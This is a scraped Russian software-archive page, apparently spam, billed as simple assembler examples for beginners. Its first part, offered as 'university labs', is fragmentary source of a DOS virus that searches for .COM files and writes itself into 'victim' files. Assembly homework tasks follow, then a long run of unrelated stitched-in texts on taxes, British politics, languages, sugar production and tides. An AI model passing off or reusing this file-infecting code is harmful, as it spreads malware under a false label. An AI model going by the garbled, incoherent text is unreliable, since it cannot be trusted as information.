Софт-Архив

ассемблер примеры задач

Рейтинг: 4.3/5.0 (1343 проголосовавших)

Описание

Простые примеры программ на ассемблере для новичков

17 ответов

могу выложить свои лабы с универа. на 2ом курсе писались. уровень сложности низкий, но для новичка покатит.

start:     jmp vir                ;Передача управления вирусному коду

vir:       push ds                ;Сохраним DS. Корректируем

mov ax,ds              ;регистр DS  .

db 05h                 ;Код команды

add_to_ds: dw 0                   ; " ADD AX,00h "

mov ds,ax              ;AX -> DS    .

fresh_bytes:

mov al,old_bytes

mov cs:[100h],al

mov al,old_bytes+1

mov cs:[101h],al

mov al,old_bytes+2

mov cs:[102h],al

mov al,byte ptr cs:[bx];Читаем из DTA байт и  перено-

mov ds:[si],al         ;сим его в мас сив.

inc bx                 ;К новому байту

inc si                 ;

loop save_dta          ;Цикл 128 раз

mov ah,4eh             ;Поиск первого файла.

mov cx,00100110b       ;archive, system hidden

lea dx,maska           ;Маска для поиска

jnc r_3                ;Нашли !

jmp restore_dta        ;Ошибка !

find_next: mov ah,3eh             ;Закроем  непод-

int 21h                ;ходящий файл.

jmp restore_dta        ;Файл нельзя закрыть !

r_2:       mov ah,4fh             ;И найдем сле-

int 21h                ;дующий.

jnc r_3                ;Файл найден !

jmp restore_dta        ;Ошибка !

r_3:       mov cx,12              ;Сотрем в буфере

lea si,fn              ;"fn" имя  пред-

destroy_name:                     ;ыдущего файла

mov byte ptr [si],0    ;

inc si                 ;

loop destroy_name      ;Цикл 12 раз.

xor si,si          ;И запишем в буфер имя только

copy_name: mov al,byte ptr cs:[si+9eh]

cmp al,0               ;что найденного файла.

je open                ;В конце имени в

mov byte ptr ds:fn[si],al   ;DTA всегда сто-

inc si                 ;ит ноль, его мы

jmp copy_name          ;и хотим достичь

open:      mov ax,3d02h           ;Открыть файл для чтения и записи

lea dx,fn              ;Имя файла.

int 21h                ;Функция DOS

jnc save_bytes

jnc found_size

jmp close              ;Ошибка !

found_size:

mov ax,cs:[09ah]       ;Найдем размер файла

count_size:mov si,ax

cmp ax,64000           ;Файл длиннее 64000 байт ?

jna toto               ;Нет.

jmp find_next          ;Да - тогда он  нам не подходит

toto:      test ax,000fh          ;Округлим размер

jz krat_16             ;до целого числа

or ax,000fh            ;параграфов    в

inc ax                 ;большую сторону

krat_16:   mov di,ax              ;И  запишем  ок ругленное  значение в DI.

; Расчитаем  смещение для перехода на       код вируса.

sub ax,3               ;Сама    командаперехода  зани мает три байта!

mov byte ptr new_bytes[1],al;Смещение найдено !

mov byte ptr new_bytes[2],ah

mov ax,di              ;Сколько   пара-

mov cl,4               ;графов содержит

shr ax,cl              ;заражаемая про грамма ?

dec ax                 ;Учитываем действие директивы  ORG 110h.

mov byte ptr add_to_ds,al ;  Корректирующее число найдено !

mov byte ptr add_to_ds+1,ah

mov ax,4200h           ;Установим ука-

xor cx,cx              ;затель на пос-

jnc read_last

jmp close              ;Ошибка !

read_last:                        ;И считаем этот

mov ah,3fh             ;байт в ячейку

mov cx,1               ; " last ".

jc close               ;Ошибка !

cmp last,'7'           ;" last " =" 7 "

jne write_vir          ;Нет - дальше

jmp find_next          ;Да- поищем дру гой файл.

write_vir: mov ax,4200h           ;Установим  ука-

jc close               ;При ошибке -закроем файл

mov ax,4200h           ;Установим  ука-

xor cx,cx              ;затель на нача-

jc close               ;При ошибке - закроем файл

mov ah,40h             ;Запишем в  файл

mov cx,80h             ;Размер DTA -128 байт.

mov bx,80h             ;Смещение к DTA

lea si,old_dta         ;Адрес массива

dta_fresh:

mov al,ds:[si]         ;Читаем из  массива "old_dta"

mov byte ptr cs:[bx],al;байт и  перенo сим его в DTA

inc bx                 ;К новому байту

inc si                 ;

loop dta_fresh         ;Цикл 128 раз

pop ds                 ;Восстановим испорченный DS

push cs                ;Занесем в стеk регистр CS

db 0b8h                ;Код команды

jump:      dw 100h                ;mov ax,100h

push ax                ;Занесем в стек число 100h

retf                   ;Передача управления на заданный адрес.

;\*Data area.

old_bytes db   0e9h               ;Исходные три байта  заражен-

dw   vir_len + 0dh      ;ной программы

old_dta   db   128 dup (0)        ;Здесь вирус хранит исходную DTA программы

maska     db   '*.com',0          ;Маска для поиска файлов.

fn        db   12 dup (' '),0     ;Сюда помещается имя файла -жертвы.

new_bytes db   0e9h               ;Первые три бай-

db   00h                ;та вируса в

Ассемблер Примеры Задач:

  • скачать
  • скачать
  • Другие статьи, обзоры программ, новости

    Решение задач на ассемблере - Помощь студентам - Форум программистов

    он только вычитает, но без степеней.

    Задание 2. Даны 3 не равные между собой величины: X, Y, Z. Найти среди них максимум и минимум.

    Пусть X, Y и Z – переменные размером в слово. Записать в переменную Q максимальное из чисел, в переменную R минимальное из чисел. Использовать разные команды перехода для чисел со знаком и без знака Результаты выдать на экран.

    Если результат получится отрицательный, то получить его абсолютное значение. Результаты выдать в окно сообщений на экран.

    на это у меня есть подобное;

    Задание 5. Вычислить выражение W=a/b*(c+d)-(a-b)/b/c+1E-8.

    В выражении используются однобайтовые величины. Если результат вычитания получится отрицательный, то выдать на экран кроме полученного результата сообщение: «Результат отрицательный».

    Пусть X, Y и Z – переменные размером в слово. Записать в Z максимальное из чисел. Использовать разные команды перехода для чисел со знаком и без знака Результаты выдать на экран.

    Выполнить умножение для байтов, слов, двойных слов. Если результат умножения не умещается в формат сомножителей, то анализируя флаги переноса и переполнения, выдать сообщение на экран.

    Выполнить умножение для байтов, слов, двойных слов. Если результат умножения не умещается в формат сомножителей, то анализируя флаги переноса и переполнения, выдать сообщение на экран.

    R=-18*z*x*y+15*x*y*z-21+6*(x+y), если x>y>z,

    R=14x4 - 5x3 + 11x – 17z

    Задачи по ассемблеру

    / лабораторная работа / лабораторные работы по ASSAMBLER / задачи по ассемблеру

    ЗАДАНИЕ № 1

    НА САМОСТОЯТЕЛЬНУЮ РАБОТУ СТУДЕНТАМ

    по курсу '' Программирование на языке Ассемблера''

    1. ЗАДАЧА. Дан массив из 10 беззнаковых слов. Инвертировать биты старших байтов всех элементов массива. Найти сумму четных элементов

    полученного массива.

    2. Задача: Дан массив из 12 беззнаковых чисел (байтов).

    Определить количество тех элементов массива, двоичные

    коды которых содержат 0 в битах 1 и 5.

    3. Задача: Дан массив из 9 знаковых чисел (байтов). Биты

    отрицательных чисел сдвинуть арифметически вправо на

    2 разряда, а биты 0 и 4 положительных чисел сбросить.

    4. Задача: Дан массив из 10 слов. Инвертировать биты младших

    байтов четных элементов массива.

    5. Задача: Дан массив из 10 слов. Инвертировать все отрицательные

    числа и найти сумму элементов полученного массива.

    6. Задача: Дан массив из 10 беззнаковых чисел (байтов).

    Коды четных элементов массива сдвинуть логически влево,

    а нечетных – арифметически вправо.

    7. Задача: Дан массив из 12 знаковых слов. Определить сумму

    10. Задача: Найти сумму положительных байтов массива, за-

    11. ЗАДАЧА: Определить сумму элементов массива, превышающих

    заданную величину В, и количество элементов, меньших В.

    12. ЗАДАЧА. Установить 0 в 5-ом бите всех байтов массива с четным

    индексом и 1 в 4-ом бите всех нечетных байтов массива. Определить

    сумму элементов полученного массива.

    13. ЗАДАЧА. Дан массив из 10 беззнаковых байтов. Инвертировать те

    байты, в старших битах которых имеются 1. Найти сумму элементов

    полученного массива.

    14. ЗАДАЧА: Установить 1 в 4-ых битах всех элементов массива

    из 10 байтов. Определить сумму элементов полученного массива.

    15. ЗАДАЧА: Байты элементов массива, в 7-ых битах которых

    имеется 1, сдвинуть логически вправо на один разряд. Опреде-

    лить сумму элементов полученного массива.

    18. Задача: Дан массив из 10 беззнаковых чисел (байтов).

    Коды четных элементов массива сдвинуть логически влево,

    а нечетных – арифметически вправо. Найти сумму элементов

    полученного массива

    19. ЗАДАЧА: Дан массив из 10 беззнаковых чисел (байтов).

    Определить сумму тех элементов массива, двоичные коды

    которых содержат 1 в битах 2 и 6.

    20. ЗАДАЧА. Элементы массива из 10 байтов объединить по ИЛИ

    с кодом 01101011. В полученном массиве подсчитать количество элементов, меньших числа 128.

    21. Задача: Дан массив из 10 слов. Определить минимальный и

    максимальный элементы массива.

    22. Дан массив из 10 беззнаковых чисел (байтов).

    Определить количество тех элементов массива, двоичные

    коды которых содержат 0 в битах 1 и 5.

    23.Задача: Дан массив из 12 слов. Инвертировать все отрицательные

    25. Задача: Дан массив из 10 знаковых слов. Определить сумму

    положительных и сумму отрицательных элементов. Проверить

    наличие в коде суммы отрицательных элементов 1 в 5 бите.

    26. ЗАДАЧА. Элементы массива из 10 байтов объединить по ИЛИ

    с кодом 01101011. В полученном массиве подсчитать количество элементов, больших числа 128.

    27. ЗАДАЧА: Определить сумму элементов массива, превышающих

    заданную величину В, и количество элементов, меньших В.

    Учебники по ассемблеру в задачах и примерах

    Учебник по языку Ассемблер в задачах и примерах

    Причем требует обязательной зарисовки предметов, встречающихся в задачах. Пример: зарисовка моркови. Без разрешения из ее класса учащиеся уходят с уроков. Учительница Горяинова к тому, что уже сказано о ней выше, а именно, что не применяет наглядных пособий, из материала делает винегрет. Ввиду того, что плана урока нет, остается время, так она на этом же уроке идет к изучению металлов и нефти. ВОПРОСЫ МЕТОДИЧЕСКОГО ПОРЯДКА как таковые учителями не изучаются. Абсолютно нечего сказать об овладении этими вопросами с точки зрения теории. Учителями такие вопросы, как организация пед. процесса, урок - как форма педпроцесса, проведение открытых уроков и их разбор, поведение учителя в классе и др. не изучаются и не разбираются. РУССКИЙ ЯЗЫК. Выше уже было сказано, что русского языка как предмета в школе не ведется. Иногда уроки по русскому в старших классах бывают, и их проводит математик ТЮРК. Неграмотность по русскому языку исключительно велика. При этом протаскивается в диктанте такой материал: "Он купил землю за Волгой, вступил во владение ею и начал готовиться к переселению"

    Не включение каких–либо из указанных сумм в декларацию может служить основанием, как для административных санкций, так и для уголовного преследования. Занижение размеров полученных косвенных выплат, выгод и льгот может быть квалифицировано как умышленное сокрытие доходов от налогообложения. Во всех странах в совокупный годовой доход включаются доходы от предпринимательской деятельности. Некоторые виды предпринимательской деятельности облагаются самостоятельным промысловым (профессиональным) налогом. При этом из совокупного годового дохода предпринимателей вычитаются производственные издержки, а также ряд иных расходов, предусмотренных законодательством всех развитых стран. Пассивные доходы, такие, как дивиденды, проценты по облигациям и по остаткам на счетах банков, проценты по государственным, муниципальным и другим ценным бумагам, могут как включаться в совокупный годовой доход налогоплательщика для целей налогообложения подоходным налогом, так и исключаться из налогооблагаемой суммы. Пассивные доходы, как правило, облагаются налогом по льготным ставкам либо на основании специальных статей законов, регламентирующих подоходное налогообложение физических лиц, либо на основании отдельных специальных законов.

    В ряде стран разрешено при наличии соответствующих, определенных в законодательстве обстоятельств рассчитывать размер налоговых обязательств текущего года с учетом расходов будущих периодов. Основные различия при исчислении налоговых обязательств физических лиц по подоходному налогообложению в развитых странах заключаются в следующем: - во всех странах расчет совокупного годового дохода, скорректированного валового дохода и налогооблагаемого дохода имеет свои особенности и отличия. Существуют очень важные, а иногда и принципиальные различия в правилах по определению источников доходов; - состав дохода, включаемого в совокупный годовой доход, отличается своей спецификой часто не только в одной стране, но и на региональном (земельном, провинциальном, штатном) уровне. Последнее – особенно характерно для стран с федеративным и конфедеративным устройством. Для налогоплательщика также большое значение может приобретать специфика определения момента получения дохода; - имеются различия при определении категории «объект налогообложения», т.е. объектом может выступать доход каждого члена семьи в отдельности или может применяться совокупное налогообложение дохода всей семьи как единого целого.

    Брандта усилило социальный характер налогового реформирования. Во Франции подобные изменения были связаны с приходом президента Ф. Миттерана, а затем противоположное движение стало нарастать с усилением позиций блока правых партий «Объединение в поддержку Республики – Союз за французскую демократию». Наиболее яркое изменение курса социальной направленности налоговых преобразований в Соединенном Королевстве Великобритании и Северной Ирландии было связано с приходом правительства во главе с М. Тэтчер. Даже поверхностный анализ тенденции в реформировании налогообложения в периоды правлений администраций Р. Рейгана и Б. Клинтона позволяет сделать вывод о противоположной направленности налоговых изменений, осуществлявшихся в США в 80–е и 90–е гг. Подобная социальная ориентация налоговых реформ существует и в других странах ОЭСР. Однако в меньшей степени она была характерна для стран, имевших стабильный курс социальной политики: Швейцарской Конфедерации, Финляндии, Швеции (до середины 90–х гг.), Бельгии, Нидерландов, Люксембурга, Австралии, Канады и Новой Зеландии.

    Главой государства является монарх, Королева Елизавета II занимает свой пост с 1952 г. является 42 монархом Великобритании и 6 по счёту королевой. Её власть является номинальной, т.е. “ царствует, но не управляет”. Власть переходит по наследству от одного представителя царствующей династии к другому в установленном законе порядке. Денежное содержание королевы складывается из доходов от её личного имущества и ассигнований из государственного бюджета, получаемых ею по цивильному листу, принимаемому парламентом. При королеве состоит совет, который помогает ей управлять. Полномочия Королевы Великобритании: - королева является главой государства, исполнительная власть принадлежит главе правительства; - является главнокомандующим вооружённых сил; - имеет право поощрять за заслуги перед государством, предоставлять почётное гражданство; -представляет государство на международной арене, но согласует свои действия с внешнеполитическим курсом Правительства; - все акты, исходящие от королевы подлежат конт - ассигнации, т.е. акты, подписываются премьер-министром; - имеет право вето на законы принятые парламентом; Английская корона около 280 лет не пользуется своим правом абсолютного вето, но это право не отменено и оно может быть использовано при чрезвычайных обстоятельствах. - королева может созывать внеочередную сессию парламента; - королева в своей деятельности независит от политических партий; - королева может распустить парламент и назначить внеочередные выборы в том случае, если парламент выразит недоверие правительству и другие полномочия.

    На парламентских выборах 1983 года в Англии консервативная партия, собрав 42,4 % голосов, получила 61 % мест в палате общин. Лейбористская партия соответственно 27,6% и 32 %, а Альянс либеральной и социал-демократической партии 25,4 % и .4 %. Таким образом, норма представительства консерваторов и лейбористов была завышена, а норма представительства Альянса занижена более чем в шесть раз. Обычно при мажоритарной избирательной системе относительного большинства выборы проводятся по унономинальным округам. В случае же проведения выборов, согласно этой системе, по полиноминальным округам голосование приходит в еще большее противоречие с его результатами. Показательна в этом отношении практика избрания президентских выборщиков в США, где каждый штат посылает столько выборщиков, сколько он избирает конгрессменов. Побеждает тот список кандидатов в выборщики, который набрал в данном штате хотя бы относительное большинство голосов. Это приводит к явному искажению воли избирателей. Так, на президентских выборах 1980 года Р.

    Во второй половине XX века в законодательном порядке была введена новая классификация преступных деяний. Это прежде всего выделение более серьезных преступлений, за которые устанавливалось наказание в виде лишения свободы на срок свыше 5 лет. Для преступлений этой группы была установлена упрощенная процедура ареста подозреваемого. Для остальных преступлений, как менее общественно опасных, такая процедура ареста не предусматривалась. В Законе о преступлении (наказаниях) 1997 г. говорится о серьезных преступлениях. Преступление, совершенное в Англии и Уэльсе, признается серьезным, если оно является одним из следующих, а именно: а) покушением, сговором или подстрекательством к тяжкому убийству; б) преступлением, согласно параграфу 4 Закона о преступлениях против личности 1861 г. (подстрекательство к тяжкому убийству); в) простым убийством; г) преступлением, согласно параграфу 18 Закона о преступлениях против личности 1861 г. (умышленное ранение или причинение тяжких телесных повреждений); д) изнасилованием или покушением на изнасилование; е) преступлением, согласно параграфу 5 Закона о половых преступлениях 1956 г. (половые сношения с девушкой в возрасте до 13 лет); ж) преступлением, согласно параграфу 16 (владение огнестрельным оружием с намерением причинить вред), параграфу 17 (сопротивление аресту) или параграфу 18 (ношение огнестрельного оружия с преступным намерением) закона об огнестрельном оружии 1968 г.; и) ограблением, если во время совершения преступления преступник владел огнестрельным оружием или его имитацией в значении данного Закона.

    Он больше не мог бывать в библиотеке, его ялик стоял бесцельно у причала и обрастал ракушками. Однажды, прогуливаясь недалеко от берега, Джек повстречал компанию пиратов-устричников. Это были любители выпить, веселый, бесшабашный, бесстрашный, порой жестокий сброд. Некоторые из них имели провинности перед законом и пострашнее, чем кража устриц из чужих садков. Джек знал, что у них редко бывает меньше двадцати пяти долларов за ночь «работы». А со своей лодкой можно выручить и около двухсот долларов. Из разговора он услышал, что один из пиратов по прозвищу Француз хочет продать свой шлюп «Пирушка» за триста долларов. Джек мгновенно решился: «Куплю!». А деньги можно занять у няни Дженни. На следующий день он явился с деньгами на борт «Пирушки» и сделка состоялась. Следующей ночью он вышел в море с остальной пиратской флотилией. За несколько недель он утвердился среди остальных устричных пиратов с репутацией самого отчаянного и безрассудного человека. Среди этих разных людей, постоянно пьяных, часто возникали ссоры, заканчивающиеся, порой довольно печально. Удар ножа – и готово.

    Здесь выделяют практически чистую сахарозу из многокомпонентной смеси, которой является сироп. В сокоочистительном отделении из диффузионного сока удаляется около 1/3 несахаров, остальные несахара вместе с сахарозой поступают в продуктовое отделение, где большая часть сахарозы выкристаллизовывается в виде сахара-песка, а несахара остаются в межкристальном растворе. Выход сахара на 75% зависит от потерь сахара в мелассе. Потери в продуктовом отделении определяют технико-экономические показатели завода. Качество сахара прямо связано с потерями его в мелассе. Задачей оптимизации технологического процесса является выбор между глубоким истощением мелассы и качеством песка. Задача получения сахара стандартного качества решается с помощью многоступенчатой кристаллизации, при этом потери будут минимальны. И) Сушка, охлаждение и хранение сахара. Целью сушки является удаление поверхностной влаги и обеспечение длительного хранения кристаллического сахара. На сушку направляется сахар с =60 5о 0C после центрифугирования и влажностью 0.8-1.2%. Для обеспечения длительного хранения влажность должна соответствовать относительной влажности хранилища.

    В числе примеров — горнорудная промышленность ЮАР, сельскохозяйственные плантации в Доминиканской Республике, Малайзии и Испании, каучуковая и резиновая промышленность Малайзии. Нельзя, разумеется, отрицать и негативные последствия иммиграции, которые в развитых странах связаны, прежде всего с понижением в результате притока иммигрантов реальных зарплат неквалифицированной рабочей силы. Например, в США один из каждых четырех занятых с образованием менее 12 классов — иммигрант. Иммигранты занимают места в секторах, производящих не торгуемые товары, которые в противном случае могли бы перейти к местным рабочим, в результате торговли оказавшимся вытесненными из секторов, производящих торгуемые товары. (Наглядно последствия ММРС для стран показаны в таблице 3.) Заключение. Миграция рабочей силы представляет собой переселение трудоспособного населения из одних государств в другие сроком более чем на год, вызванное причинами экономического и иного характера, и может принимать форму эмиграции (выезда) и иммиграции (въезда).

    Письменность лишь на кати. 7. Тохарские языки В группу тохарских языков включают мёртвые языки, носящие условные имена "тохарский А" и "тохарский Б". Иногда их именуют по названиям оазисов в Восточном Туркестане (Китай, провинция Синьцзян), где жили тохары, карашарским. или агнеанским, и кучанским. Найденные тексты датируются 5—8 вв. но отдельные тохарские слова и имена богов встречаются в текстах на пракрите из оазисов юга Восточного Туркестана. относящихся к началу н.э. Тохары оказались тем индоевропейским народом, который продвинулся в период миграций дальше всех с запада на восток. На своём пути они вступали в оставившие свои следы в общетохарском языке и в обоих позднее выделившихся тохарских языках контакты с носителями многих языков (возможно, с носителями диалектов, из которых возникли анатолийские языки и которые были связаны с италийско-кельтской группой индоевропейских диалектов, с предками носителей балтославянских и германских языков, а также финно-угорских языков, а затем с носителями восточноиранских языков).

    Особенности древнемакедонского языка: различение долгих и кратких гласных; сохранение дифтонгов и сонантов; отражение звонких придыхательных как звонких (в отличие от греческого языка); сохранение качества простых звонких и глухих; сохранение велярности заднеязычных палатальных; наличие форм на -а, на -о и на отдельные согласные; в словообразовании наличие греческого типа деривации и словосложения с негреческими формантами; в лексике слои автохтонный негреческий (палеобалканский) и архаический греческий. 15. Венетский язык На венетском языке говорили племена, населявшие территорию современной северовосточной Италии и прилегающих областей Австрии и Хорватии. Он был вытеснен латинским языком. Венетский язык связан рядом изоглосс с языками италийскими, германскими и иллирийскими. Язык засвидетельствован в кратких надписях (около 250 текстов). Использовалось частью северноэтрусское письмо с добавлением греческих знаков (6—2 вв. до н.э.), а частью латинское письмо (2—1 вв. до н.э.). Особенности: 5 различавшихся по долготе/краткости гласных; двойная система дифтонгов, 5 сонантов, 11 шумных согласных; сведение трёх и.-е. серий смычных к двум с утратой звонких придыхательных; сохранение и.-е. лабиовелярного kw ; появление новых щелевых и аффрикаты; семипадежная система склонения, 3 рода, 3 числа; наличие особых основ; 4 типа спряжения в презенсе и претерите; медиопассив на -r; сигматический аорист; причастия на - и -m o; схема предложения в посвятительном тексте om Vfi acc; известно около 300 имён собственных и около 60 апеллятивов. 16. Италийские языки Италики пришли с севера на Апеннинский полуостров во 2-м тысячелетии до н.э. К италийским языкам относят языки, принадлежащие к латино-фалискской и оскско-умбрской ветвям.

    Конфуцианско-даосистский тип культуры. Культура Китая Древнекитайская цивилизация. Эпоха древнекитайской цивилизации восходит к рубежу III - II тыс. до н.э. концом ее считают крушение империи Хань (220 г. н.э.). Специфика, природных условий в значительной мере обусловила ряд важнейших особенностей древнекитайской цивилизации. Климатические условия были более суровыми, чем в Египте, Шумера, Индии, поэтому государство сложилось гораздо позже и на более высоком уровне развития производительных сил. Сыграло свою роль и то, что до середины I тыс- до н.э. Древний Китай развивался почти в отрыве от других цивилизаций. Китайский этнос создал особый тип культуры, отличающий его от культур других народов. Социальная этика и административная практика здесь всегда играли более значительную роль, чем мистика или поиски индивидуального спасения. Величайшими пророками здесь считались те, кто учил жить достойно, в соответствии с принятой нормой, а не ради спасения на свете. Начиная со II тыс. до н.э. китайцы верили многим богам, приносили им жертвы, затем на первый план выходит шанди, но и он воспринимался как первопророк и бог одновременно. Всекитайский пантеон.

    Каждое явление природы, будь то цветок, животное или водопад, - воплощают в себе мудрость природы и ее богатство. Мир изначально совершенен, поэтому его не надо переделывать, надо самоустраниться, уподобиться природе, чтобы не мешать осуществлению гармонии. Изначально природе присущи пять совершенств: человечность (жень), чувство долга (и), благопристойность (ли), искренность (синь) и мудрость (джи). Китайская культура призывает к действию в соответствии с космическим ритмом. Творчество принадлежит небу. Эта идея социально-этического политического порядка, санкционированного - великим небом. Эта идея поддерживалась и развивалась в учениях даосизма и конфуцианства, не изменил эту идею и буддизм. Опираясь на древние представления о небе и высшей небесной благодати (дэ), конфуцианство выработало постулат, согласно которому правитель получал божественный мандат (мин) на право управления страной. Если правитель отступал от принятых норм, выражением чего был экономический упадок, волнения, правитель терял право на мандат неба (дэ) (тот тезис Конфуция служил предостережением императорам, которые пытались отклониться от социальных и моральных норм).

    Эстетические представления Лафонтена в художественной рефлексии русских писателей последней трети XVIII века Т.В. Саськова Имя Ж. де Лафонтена тесно связано с русской культурой ХVIII в. и различия в восприятии его творчества на разных этапах весьма симптоматичны. Начальный период освоения, пришедшийся на 1740-е - 1770-е гг. при всех оговорках, связан с доминированием классицизма в отечественной литературе. В это время востребован преимущественно опыт Лафонтена-баснописца, придавшего неотразимый блеск и острую современность древней жанровой разновидности, а вот его эстетические воззрения в художественно-аналитической форме пока мало интересуют русских писателей, в своей теоретической рефлексии следовавших прежде всего за Н. Буало (см. напр. «Две эпистолы» А. Сумарокова - вольное переложение «Поэтического искусства» Н. Буало). Любопытный сдвиг происходит в последней трети ХVIII в. в ходе нарастающей сентиментализации русской культуры в сочетании с ощу-тимым рокайльным воздействием. Теперь, наряду с баснями, все больший интерес вызывают «сказки» Лафонтена, а кроме того, появляются первые переложения повести «Любовь Психеи и Купидона».

    Ужасные результаты московского пожара были следствием не только победы крымского хана и военной слабости опричнины, царь Иван был несомненно виновен в том, что Москва была плохо укреплена. После сожжения Москвы Давлет-Гирей ушел, но своей цели достиг: захватил "полон" и добычу, разграбил много городов, в основном Рязанской области. Все это жестоко ударило по престижу царя Ивана и опричнины. Дальнейшие переговоры с Давлет-Гиреем сорвались и тот решил на следующий год закрепить успех и повторить набег. (2;95) Иван IV принял тогда верное решение: для отпора он объединил земские и опричные войска. Они не просто стояли рядом, теперь в каждом полку были и земские и опричные служилые люди, и земские и опричные воеводы. Нередко опричники оказывались под началом у земских воевод. Главнокомандующим был назначен князь Михайло Иванович Воротынский, который незадолго до этого провел немало лет в тюрьме и ссылке. 30 июля 1572 года возле деревни Молоди, примерно в 45 км от Москвы произошла решительная битва. Русские войска нанесли сокрушительное поражение Давлет-Гирею. Победа была полной, кырмская опасность была ликвидирована на 10-15 лет. Страна была спасена.

    Осу- ществленное 10 лет назад выделение и клонирование кДНК этого гена сделало реальным оба эти подхода. Имеются сообщения о получении трансгенных животных (коз), в геном которых введен ген фактора VIII. Они могут быть использованы как продуценты полноценного белкового продукта. Генная терапия этого забо- левания находится на стадии экспериментальных разработок (см.Главу IX). Успешно осуществлена трансдукция фибробластов человека i vi ro с помощью ретровирусного вектора. Основная проблема в данном направлении заключается в выборе эффектив- ного промотора и подборе клеток, в которых экспрессия гена могла быть достаточно длительной. В настоящее время найдены невирусные промоторы, обеспечивающие эффективную и длитель- ную экспрессию гена фактора VIII i vivo. В качестве возмож- ных клеток-мишеней используют мышечные клетки, фибробласты, гепатоциты и клетки эндотелия сосудов. В 1994г. методом нап- равленного мутагенеза (см.Главу VIII) получены трансгенные модели гемофилии А на мышах. Есть все основания считать, что клинические испытания генокоррекции этого заболевания нач- нутся уже в ближайшем будущем. 10.4.4 Гемофилия B. Гемоофилия B - сцепленное с полом заболевание, вызван- ное наследственным дефектом фактора IX - важного компонента средней фазы внутреннего каскада свертывания крови.

    Кроме того, данный материал играет роль гидроизоляции придает аккуратный внешний вид зданию. Крыша. Покрытие двускатное, пятислойное, теплое, с наружным водостоком с целью предотвращения таяния снега и образования наледей. Крыша здания состоит из стропил, подстропильных конструкций и панелей покрытия. Несущие конструкции покрытий, при шаге колонн 24 м применяют подстропильной конструкции, располагаемые продольно, они служат опорами для строительных конструкций. Подстропильные балки: длина балки соответствует пролету, высота ее 1500мм, сечение тавровое с полкой внизу. Окна. Заполнение оконного проема состоит из оконных коробок, оконных переплетов и подоконной доски. Оконные проемы заполняют переплетами с двойным остеклением. Высота подоконников от пола 2,4 - 3,6 м. Металлические переплеты изготавливают из алюминиевых прокатных профилей. Стекла вставляют с внутренней стороны. Высота - 1,2 м и ширина 2 м. Подоконники устраивают с уклоном внутрь помещения. Оконные переплеты изготовлены из дерева, они менее долговечны в эксплуатации, но просты в устройстве и обладают небольшой стоимостью. Двери. Изготавливают по размерам, предусмотренным ГОСТ 6629-64, в виде блоков, входные двери двустворчатые, ширина - 700 мм, высота - 2000 мм. Ворота. Предусматриваются для въезда автопогрузчиков.

    Хорошо ли он Загадки с подсказкой. русские загадки. познакомился с окружающим миром? Придумываем свои загадки. Знает ли он признаки, качества, 4.МаршакС.Я. свойства предметов и явлений? Загадки. Знание загадок не только развивает 5.Саша Чёрный память, но и воспитывает поэтическое Загадки. чувство, подготавливает ребёнка к 6.Чуковский К.И. восприятию литературы. В процессе знакомства с народными и Скрюченная авторскими загадками дети сравнивают песня. их, находят общее и различия. Делают 7.Чичинадзе Гиви вывод, что иногда по части мы можем узнать целое, на этом принципе Правда ли? построены загадки. Иногда в основе 8.Благинина Е. лежит сходство и различие предметов. Загадки. Дети замечают, что автор в загадке часто использует подсказку- рифму. Срифмовав свою догадку с предыдущей строчкой, ребёнок легко находит ответ. Игра в отгадывание предмета превращается в новую игру- отгадывание рифмы. Важно, чтобы дети читая загадки были внимательны к любой мелочи, детали, не искали очевидных сходств и различий, а были более наблюдательны. б) Скороговорки. Это весёлая и безобидная игра в 1.Очень быстро говорим. 1.Старинные 8 быстрое, чёткое повторение 2.Из чего «сделана» русские часов труднопроизносимых стишков и фраз. скороговорка? пословицы и На занятиях наблюдая за разными 3.Наши выдумки. поговорки. скороговорками дети пытаются понять 2.Хармс Д принцип их составления. Иван Топорышкин. Выводы детей: Повторяются одинаковые согласные. 3.Токмакова И. Зеркальное повторение двух почти Простуда одинаковых слов (Архип осип, Осип кашалота. охрип). 4.Витез Григор Есть скороговорки, где надо быстро Петух Будидень и произнести слово, которое состоит из ленивый Радо. нескольких слов или одного корня и 5.Бородицкая М. нескольких приставок и суффиксов.

    Из такого же мрамора высечены резные портики дверей с многофигурными бронзовыми рельефами. Рускеальский мрамор оказался очень нестойким и стал быстро разрушаться. Поэтому в 1870–1890-х годах, при первой реставрации собора многие плиты рускеальского мрамора были заменены вставками из более однородного бледно-серого итальянского мрамора. мундир – из серого гранита, воротник мундира – из аспидного сланца, плащ – из шокшинского малинового кварцита, орденскую ленту – из зелёного мрамора, а ордена – из жёлтого сиенского мрамора и малинового кварцита. Постаментом бюста послужил розовый тивдийский мрамор. Здесь, может быть, уместно вспомнить слова Александра Дюма из мало известного сейчас некролога, посвященного О. Монферрану и написанного во время его недолгого пребывания в Петербурге в 1858 году, как раз после открытия собора и смерти архитектора: «Гильберти, которому поручили ваяние дверей баптистерия во Флоренции, склонился над ними в 20-летнем возрасте молодым темноволосым человеком, а разогнулся только 60-летним седым стариком.

    Вокруг этой точки и происходит вращение как тяжелого, так и легкого шарика. Точно так же Земля и Луна вращаются вокруг некоторой точки, которая, в следствии того, что Земля гораздо массивнее Луны, оказывается даже лежащие внутри Земли (но не в её центре). Центр Земли вращается вокруг этой точки, а вода на поверхности Земли отбрасывается от центра вращения. Это приводит к тому, что и на противоположной Луне стороне Земли образуется водяной горб. Поверхность океана принимает удлиненную форму, вытянутую в направлении Луны и(немного меньше) в прямо противоположном направлении. Так как Земля вращается и вокруг собственной оси, «двугорбая» приливная волна «бежит» по поверхности Земли. В тех областях, которые оказываются посредине между двумя горбами, наблюдаются отливы. Изучение приливов связано со многими трудностями. Та упрощенная модель, которую мы рассматривали, далека от реальной картины. Земля, как известно, не шар, она сплюснута у полюсов; вода не распределена равномерно по её поверхности. Луна при своем движении по орбите оказывается на разных расстояниях от Земли.

